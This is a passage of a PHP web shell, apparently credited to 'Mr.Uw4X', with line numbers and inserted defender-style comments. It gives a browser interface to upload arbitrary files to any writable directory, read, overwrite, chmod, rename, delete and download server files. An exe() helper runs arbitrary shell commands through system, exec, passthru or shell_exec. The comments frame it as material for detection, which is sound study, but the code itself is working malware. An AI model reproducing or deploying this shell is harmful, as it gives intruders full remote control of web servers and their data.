  575. for($i=0;$i<=$id;$i++){
  576. echo "$paths[$i]";
  577. if($i != $id) echo "/";
  578. }
  579. echo '">'.$pat.'</a>/';
  580. }
  581. echo '</td></tr><tr><td><center>';
  // File upload: the uploaded temporary file is copied to $path joined with the file name
  // supplied by the client. No check on name, extension, size or destination is made here, so
  // this writes arbitrary content - including further scripts - to any directory the PHP
  // process can write to.
  // Detection: multipart POST requests to this script and new or changed files under the web
  // root; file-integrity monitoring on served directories catches the result.
  582. if(isset($_FILES['file'])){
  583. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  584. echo '<center><font color="blue">Upload Success</font><br /></center>';
  585. }else{
  586. echo '<center><font color="red">Upload Failed</font><br/></center>';
  587. }
  588. }
  // The upload form is printed on every page of the authenticated view.
  589. echo '<form enctype="multipart/form-data" method="POST">
  590. <font color="white">File Upload :</font> <input type="file" name="file" />
  591. <input type="submit" value="upload" />
  592. </form>
  593. </center></td></tr>';
  594. if(isset($_GET['filesrc'])){
  595. echo "<tr><td>Current File : ";
  596. echo $_GET['filesrc'];
  597. echo '</tr></td></table><br />';
  598. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  599. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  600. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  601. if($_POST['opt'] == 'chmod'){
  602. if(isset($_POST['perm'])){
  603. if(chmod($_POST['path'],$_POST['perm'])){
  604. echo '<font color="blue">Set Permission Success</font><br/>';
  605. }else{
  606. echo '<font color="red">Set Permission Failed</font><br />';
  607. }
  608. }
  609. echo '<form method="POST">
  610. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  611. <input type="hidden" name="path" value="'.$_POST['path'].'">
  612. <input type="hidden" name="opt" value="chmod">
  613. <input type="submit" value="Go" />
  614. </form>';
  615. }elseif($_POST['opt'] == 'rename'){
  616. if(isset($_POST['newname'])){
  617. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  618. echo '<font color="blue">Ganti Nama Success</font><br/>';
  619. }else{
  620. echo '<font color="red">Ganti Nama Failed</font><br />';
  621. }
  622. $_POST['name'] = $_POST['newname'];
  623. }
  624. echo '<form method="POST">
  625. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  626. <input type="hidden" name="path" value="'.$_POST['path'].'">
  627. <input type="hidden" name="opt" value="rename">
  628. <input type="submit" value="Go" />
  629. </form>';
  630. } elseif($_POST['opt'] == 'edit'){
  631. if(isset($_POST['src'])){
  632. $fp = fopen($_POST['path'],'w');
  633. if(fwrite($fp,$_POST['src'])){
  634. echo '<font color="blue">Success Edit File</font><br/>';
  635. }else{
  636. echo '<font color="red">Failed Edit File</font><br/>';
  637. }
  638. fclose($fp);
  639. }
  640. echo '<form method="POST">
  641. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  642. <input type="hidden" name="path" value="'.$_POST['path'].'">
  643. <input type="hidden" name="opt" value="edit">
  644. <input type="submit" value="Save" />
  645. </form>';
  646. }
  647. echo '</center>';
  648. }else{
  649. echo '</table><br/><center>';
  650. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  651. if($_POST['type'] == 'dir'){
  652. if(rmdir($_POST['path'])){
  653. echo '<font color="blue">Directory Delete</font><br/>';
  654. }else{
  655. echo '<font color="red">Directory Failed Deleted                                                                                                                                                                                                                                                                                             </font><br/>';
  656. }
  657. }elseif($_POST['type'] == 'file'){
  658. if(unlink($_POST['path'])){
  659. echo '<font color="blue">File Terhapus</font><br/>';
  660. }else{
  661. echo '<font color="red">File Failed Dihapus</font><br/>';
  662. }
  663. }
  664. }
  665.  
// Close the preceding centered section and open the file-manager table with its header row.
echo '</center>';
echo '<div id="content"><table width="1250" cellpadding="2" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Type</center></td>
<td><center>Last Modify</center></td>
<td><center>Owner/Group</center></td>
<td><center>Size</center></td>
<td><center>Permission</center></td>
<td><center>Action</center></td>
<td><center>Backup</center></td>
</tr>';
// Directory rows. $path is assigned before this section (not visible here); the
// "?path=" links emitted below suggest it is request-controlled — confirm against
// the earlier code. The listing is read once and reused by the file loop below.
$scandir = scandir($path);
foreach($scandir as $dirx){
// Type, mtime, owner and group are gathered for every entry before the is_dir() filter.
$dtype = filetype("$path/$dirx");
$dtime = date("F d Y g:i:s", filemtime("$path/$dirx"));
// Owner: account name when the posix extension is available, numeric uid otherwise.
if(function_exists('posix_getpwuid')) {
                    $downer = @posix_getpwuid(fileowner("$path/$dirx"));
                    $downer = $downer['name'];
                } else {
                    //$downer = $uid;
                    $downer = fileowner("$path/$dirx");
                }
                // Group: same fallback, group name or numeric gid.
                if(function_exists('posix_getgrgid')) {
                    $dgrp = @posix_getgrgid(filegroup("$path/$dirx"));
                    $dgrp = $dgrp['name'];
                } else {
                    $dgrp = filegroup("$path/$dirx");
                }
// Only real sub-directories are listed here; "." and ".." are skipped.
if(!is_dir($path.'/'.$dirx) || $dirx == '.' || $dirx== '..') continue;
// NOTE(review): $path and the entry name are concatenated into the markup without
// HTML escaping, so names render raw in whatever browser opens this page.
// Detection: navigation is a GET with a "path" query parameter, which ends up in
// web-server access logs.
echo '<tr>
<td><a href="?path='.$path.'/'.$dirx.'">'.$dirx.'</a></td>';
echo "<td><center>$dtype</center></td>";
echo "<td><center>$dtime</center></td>";
echo "<td><center>$downer/$dgrp</center></td>";
echo "<td><center>--</center></td>
<td><center>";
// Permission string from perms(): blue when writable, red when unreadable, plain otherwise.
if(is_writable($path.'/'.$dirx)) echo '<font color="blue">';
elseif(!is_readable($path.'/'.$dirx)) echo '<font color="red">';
echo perms($path.'/'.$dirx);
if(is_writable($path.'/'.$dirx) || !is_readable($path.'/'.$dirx)) echo '</font>';

// Per-row action form. Detection: it POSTs to "?option&path=..." with body fields
// opt (delete|chmod|rename), type=dir, name and path; the query string is visible in
// access logs, the body fields only where request bodies are captured.
echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="'.$dirx.'">
<input type="hidden" name="path" value="'.$path.'/'.$dirx.'">
<input type="submit" value="GO">
</form></center></td>
<td><center>--</center></td>
</tr>';
}
// File rows: second pass over the same scandir() result, this time keeping regular files.
foreach($scandir as $file){
// Type, mtime, owner and group are gathered for every entry before the is_file() filter.
$ftype = filetype("$path/$file");
$ftime = date("F d Y g:i:s", filemtime("$path/$file"));
// Owner: account name when the posix extension is available, numeric uid otherwise.
if(function_exists('posix_getpwuid')) {
                $fowner = @posix_getpwuid(fileowner("$path/$file"));
                $fowner = $fowner['name'];
            } else {
                //$downer = $uid;
                $fowner = fileowner("$path/$file");
            }
            // Group: same fallback, group name or numeric gid.
            if(function_exists('posix_getgrgid')) {
                $fgrp = @posix_getgrgid(filegroup("$path/$file"));
                $fgrp = $fgrp['name'];
            } else {
                $fgrp = filegroup("$path/$file");
            }
if(!is_file($path.'/'.$file)) continue;
// Size in KB rounded to 3 decimals; from 1024 KB upward it is shown in MB with 2 decimals.
$size = filesize($path.'/'.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

// NOTE(review): $path and the file name are concatenated into the markup without
// HTML escaping, so names render raw in whatever browser opens this page.
// Detection: viewing a file is a GET carrying "filesrc" and "path" query parameters,
// both of which end up in web-server access logs.
echo '<tr>
<td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>';
echo "<td><center>$ftype</center></td>";
echo "<td><center>$ftime</center></td>";
echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
echo "<td><center>$size</center></td>
<td><center>";
// Permission string from perms(): blue when writable, red when unreadable, plain otherwise.
if(is_writable($path.'/'.$file)) echo '<font color="blue">';
elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
echo perms($path.'/'.$file);
if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
// Per-row action form. It POSTs to "?option&path=..." with body fields opt
// (delete|chmod|rename|edit), type=file, name and path. The option handler earlier in
// this file passes the posted "path" straight to unlink() when type is "file", so the
// hidden field is the only thing that ties the request to this row.
echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="'.$file.'">
<input type="hidden" name="path" value="'.$path.'/'.$file.'">
<input type="submit" value="GO">
</form></center></td>';
// Download link. Detection: GET with act=download plus "dir" and "file" parameters
// holding server-side paths; the handler for it is not visible in this section.
echo "<td><center><a href='?act=download&dir=$path&file=$path/$file'>Save</a></center></td></td>
</tr>";
}
// Close the listing table and its wrapper div.
echo '</table>
</div>';
  779. }
// Page footer: horizontal rule, copyright line with the current year and the author
// handle, then the closing body/html tags. Static strings such as the handle are
// candidate content signatures when scanning a web root for copies of this file.
echo "<center><hr width=280 color=#191970>Copyright &copy; ".date("Y")." - <a href='https://www.kali.org/'><font color=blue>Mr.Uw4X</font></a></center>
</body>
</html>";
  783. //Function Code HDD + exe
  784. function hdd($s) {
  785.     if($s >= 1073741824)
  786.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  787.     elseif($s >= 1048576)
  788.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  789.     elseif($s >= 1024)
  790.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  791.     else
  792.     return $s .' B';
  793. }
/**
 * Runs $cmd through the first PHP command-execution function that exists and
 * returns whatever it printed.
 *
 * The probe order is system(), exec(), passthru(), shell_exec(), each gated on
 * function_exists(). Every call carries the @ operator, so PHP warnings from a
 * failing call are suppressed. If none of the four functions exists the function
 * falls off the end and returns null.
 *
 * Defender notes:
 * - $cmd reaches the OS shell exactly as passed in; nothing in this function
 *   validates or escapes it. Callers are not visible in this section.
 * - function_exists() reports false for functions switched off through the
 *   php.ini disable_functions directive, which is presumably why several are
 *   probed. Hardening therefore has to cover the whole family of exec-capable
 *   functions, not one of them.
 * - A function_exists() cascade over these names in a file under the web root
 *   is a strong static indicator of a web shell.
 *
 * @param string $cmd Command line handed to the shell.
 * @return string|null Captured output, or null when no execution function is available.
 */
function exe($cmd) {
    if(function_exists('system')) {
        // system() prints directly, so output buffering is used to capture it.
        @ob_start();
        @system($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();
        return $buff;
    } elseif(function_exists('exec')) {
        // exec() fills $results with one element per output line; the lines are
        // concatenated with no separator between them.
        @exec($cmd,$results);
        $buff = "";
        foreach($results as $result) {
            $buff .= $result;
        } return $buff;
    } elseif(function_exists('passthru')) {
        // passthru() also prints directly; captured the same way as system().
        @ob_start();
        @passthru($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();
        return $buff;
    } elseif(function_exists('shell_exec')) {
        // shell_exec() returns the output itself.
        $buff = @shell_exec($cmd);
        return $buff;
    }
}
  818. function perms($file){
  819. $perms = fileperms($file);
  820.  
  821. if (($perms & 0xC000) == 0xC000) {
  822. // Socket
  823. $info = 's';
  824. } elseif (($perms & 0xA000) == 0xA000) {
  825. // Symbolic Link
  826. $info = 'l';
  827. } elseif (($perms & 0x8000) == 0x8000) {
  828. // Regular
  829. $info = '-';
  830. } elseif (($perms & 0x6000) == 0x6000) {
  831. // Block special
  832. $info = 'b';
  833. } elseif (($perms & 0x4000) == 0x4000) {
  834. // Directory
  835. $info = 'd';
  836. } elseif (($perms & 0x2000) == 0x2000) {
  837. // Character special
  838. $info = 'c';
  839. } elseif (($perms & 0x1000) == 0x1000) {
  840. // FIFO pipe
  841. $info = 'p';
  842. } else {
  843. // Unknown
  844. $info = 'u';
  845. }
  846.  
  847. // Owner
  848. $info .= (($perms & 0x0100) ? 'r' : '-');
  849. $info .= (($perms & 0x0080) ? 'w' : '-');
  850. $info .= (($perms & 0x0040) ?
  851. (($perms & 0x0800) ? 's' : 'x' ) :
  852. (($perms & 0x0800) ? 'S' : '-'));
  853.  
  854. // Group
  855. $info .= (($perms & 0x0020) ? 'r' : '-');
  856. $info .= (($perms & 0x0010) ? 'w' : '-');
  857. $info .= (($perms & 0x0008) ?
  858. (($perms & 0x0400) ? 's' : 'x' ) :
  859. (($perms & 0x0400) ? 'S' : '-'));
  860.  
  861. // World
  862. $info .= (($perms & 0x0004) ? 'r' : '-');
  863. $info .= (($perms & 0x0002) ? 'w' : '-');
  864. $info .= (($perms & 0x0001) ?
  865. (($perms & 0x0200) ? 't' : 'x' ) :
  866. (($perms & 0x0200) ? 'T' : '-'));
  867.  
  868. return $info;
  869. }
  870. ?>